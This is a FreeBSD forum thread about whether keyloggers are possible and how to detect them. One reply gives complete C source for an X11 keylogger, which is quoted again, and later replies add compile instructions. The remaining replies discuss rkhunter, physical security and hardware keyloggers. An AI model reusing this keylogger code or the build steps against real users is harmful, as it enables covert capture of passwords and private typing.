keylogger for FreeBSD

[mfaridi]

can keylogger work on FreeBSD and print everything we do ?
Can I find best packages for detect keylogger ?

 

[SirDice]

Yes, a keylogger is possible.

security/rkhunter may be able to find one.

 

[expl]

If it is a custom keylogger automated tools have low chance of detecting them.

 

[lme@]

This is a simple keylogger example:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>


static Display *dpy;
static Window focuswin = None;

static void attach_to_focuswin(void) {
        int foo = 0;

        XGetInputFocus(dpy, &focuswin, &foo);

        if (focuswin != None)
                XSelectInput(dpy, focuswin, KeyPressMask | FocusChangeMask);
        else
                sleep(1);
}

static void handle_event(void) {
        XEvent ev;
        char buf[100];
        int len;

        XNextEvent(dpy, &ev);
        if(ev.xany.type == FocusOut)
                focuswin = None;
        else if (ev.xany.type == KeyPress) {
                len = XLookupString(&ev.xkey, buf, 99, 0, 0);
                buf[len] = 0;
                printf("%s", buf);
                fflush(stdout);
        }
}

int main(void) {
        dpy = XOpenDisplay(getenv("DISPLAY"));
        if (dpy == NULL) {
                fprintf(stderr, "cannot change display\n");
                exit(1);
        }
        while (1) {
                if (focuswin == None)
                        attach_to_focuswin();
                else
                        handle_event();
        }
}

 

[mfaridi]

This is a simple keylogger example:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>


static Display *dpy;
static Window focuswin = None;

static void attach_to_focuswin(void) {
        int foo = 0;

        XGetInputFocus(dpy, &focuswin, &foo);

        if (focuswin != None)
                XSelectInput(dpy, focuswin, KeyPressMask | FocusChangeMask);
        else
                sleep(1);
}

static void handle_event(void) {
        XEvent ev;
        char buf[100];
        int len;

        XNextEvent(dpy, &ev);
        if(ev.xany.type == FocusOut)
                focuswin = None;
        else if (ev.xany.type == KeyPress) {
                len = XLookupString(&ev.xkey, buf, 99, 0, 0);
                buf[len] = 0;
                printf("%s", buf);
                fflush(stdout);
        }
}

int main(void) {
        dpy = XOpenDisplay(getenv("DISPLAY"));
        if (dpy == NULL) {
                fprintf(stderr, "cannot change display\n");
                exit(1);
        }
        while (1) {
                if (focuswin == None)
                        attach_to_focuswin();
                else
                        handle_event();
        }
}

my experience about programming and shell script is so low , can you describe what can do this script ?

 

[SirDice]

can you describe what can do this script ?

If I'm not mistaken it's C source code for an Xorg keylogger :e

Why are you worried about keyloggers? If an attacker is able to install one you have way more serious problems to worry about.

 

[lme@]

my experience about programming and shell script is so low , can you describe what can do this script ?

You need to compile this with a C compiler and start it. Then it logs everything you type in X.

 

[mfaridi]

You need to compile this with a C compiler and start it. Then it logs everything you type in X.

I am sure this is hard request
but How I can compile with C compiler and after that use it ?

 

[SirDice]

but How I can compile with C compiler and after that use it ?

If you're asking this then this code is not for you.

Beware that lme@ gave you an example of a keylogger on FreeBSD. You asked if it was possible and it certainly is.

 

[mfaridi]

If you're asking this then this code is not for you.

Beware that lme@ gave you an example of a keylogger on FreeBSD. You asked if it was possible and it certainly is.

Ok
I understand
but I want have some experience with compile this script with C compiler

 

[z662]

To compile it, just run

gcc [insert name of program here]

Obviously you should omit the brackets e.g.

gcc keyLogger.c

 

[z662]

Just out of curiosity, why did you post this thread in the Firewalls section?

 

[mfaridi]

To compile it, just run

gcc [insert name of program here]

Obviously you should omit the brackets e.g.

gcc keyLogger.c

I run that and I see this error

ky.c:4:22: error: X11/Xlib.h: No such file or directory
ky.c:5:27: error: X11/Intrinsic.h: No such file or directory
ky.c:8: error: expected '=', ',', ';', 'asm' or '__attribute__' before '*' token
ky.c:9: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'focuswin'
ky.c: In function 'attach_to_focuswin':
ky.c:14: error: 'dpy' undeclared (first use in this function)
ky.c:14: error: (Each undeclared identifier is reported only once
ky.c:14: error: for each function it appears in.)
ky.c:14: error: 'focuswin' undeclared (first use in this function)
ky.c:16: error: 'None' undeclared (first use in this function)
ky.c:17: error: 'KeyPressMask' undeclared (first use in this function)
ky.c:17: error: 'FocusChangeMask' undeclared (first use in this function)
ky.c: In function 'handle_event':
ky.c:23: error: 'XEvent' undeclared (first use in this function)
ky.c:23: error: expected ';' before 'ev'
ky.c:27: error: 'dpy' undeclared (first use in this function)
ky.c:27: error: 'ev' undeclared (first use in this function)
ky.c:28: error: 'FocusOut' undeclared (first use in this function)
ky.c:29: error: 'focuswin' undeclared (first use in this function)
ky.c:29: error: 'None' undeclared (first use in this function)
ky.c:30: error: 'KeyPress' undeclared (first use in this function)
ky.c: In function 'main':
ky.c:39: error: 'dpy' undeclared (first use in this function)
ky.c:45: error: 'focuswin' undeclared (first use in this function)
ky.c:45: error: 'None' undeclared (first use in this function)

 

[z662]

Well you first need to grab your copies of the Xll header files that you are including. That should get you pointed in the right direction

 

[expl]

cc -o keylogger -I/usr/local/include -L/usr/local/lib -lX11 source.c

 

[mfaridi]

cc -o keylogger -I/usr/local/include -L/usr/local/lib -lX11 source.c

Can you little describe this

 

[Beastie]

gcc(1)

 

[janerysong]

If I'm not mistaken it's C source code for an Xorg keylogger :e

Why are you worried about keyloggers? If an attacker is able to install one you have way more serious problems to worry about.

keyloggers are hard to detect manually .You will not notice the presence of such program. It is invisible in the Task List (when you press Ctrl-Alt-Del). It will not show in Task Bar, let alone your Desktop. It does not make any noise, your system will not slow down as in the case of spyware.

 

[janerysong]

If it is Myjad keylogger automated tools have low chance of detecting them.

Scan Virus then install an anti keylogger software then change your password.

 

[kpa]

@@janerysong. This thread is about keyloggers under the FreeBSD operating system and you're referring Microsoft Windows in what you posted. I see that you are new here but please pay more attention when replying to threads that are over three years old and stay on topic.

 

[Deleted member 13721]

If someone has gotten far enough that they've been able to install a keylogger, it's likely that's the least of your worries. Physical security is a must.

 

[marwis]

Also, software keyloggers are not the only ones to worry about. Hardware keyloggers are orders of magnitude harder to detect. With some, it might be not possible at all to detect them from the operating system point of view.

You could install webcams to have 360-degree view of your system and make sure 1. nothing is being attached, and 2. your recordings are not being altered with. Still then, you wouldn't have 100% assurance that you are "secure".

I'm turning my paranoid mode off now :h .